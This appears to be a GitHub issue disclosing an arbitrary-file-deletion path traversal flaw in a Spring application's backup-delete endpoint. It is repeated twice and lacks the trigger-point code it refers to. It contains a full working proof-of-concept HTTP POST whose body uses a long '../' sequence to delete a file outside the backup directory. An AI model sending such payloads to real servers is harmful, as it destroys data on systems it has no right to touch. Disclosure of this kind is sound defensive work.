Open f4nz4i opened 7 months ago
There is a security issue in your code. This security flaw can delete arbitrary system files.
Here is the example.
Here I first created a delete.txt file and then deleted the file through this vulnerability.
And the http data is: `POST /backup/deleteBackup HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/json;charset=UTF-8 Content-Length: 44 Origin: http://127.0.0.1:8080 Connection: close Referer: http://127.0.0.1:8080/backup/index Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh-CN; JSESSIONID=559259c4-c298-4fa4-86e3-282d013fcb1d Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
["../../../../../../../../../../delete.txt"]`
The following is the vulnerability trigger point, which does not control or filter the content input by the user.
There is a security issue in your code. This security flaw can delete arbitrary system files.
Here is the example.
Here I first created a delete.txt file and then deleted the file through this vulnerability.
And the http data is: `POST /backup/deleteBackup HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/json;charset=UTF-8 Content-Length: 44 Origin: http://127.0.0.1:8080 Connection: close Referer: http://127.0.0.1:8080/backup/index Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh-CN; JSESSIONID=559259c4-c298-4fa4-86e3-282d013fcb1d Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
["../../../../../../../../../../delete.txt"]`
The following is the vulnerability trigger point, which does not control or filter the content input by the user.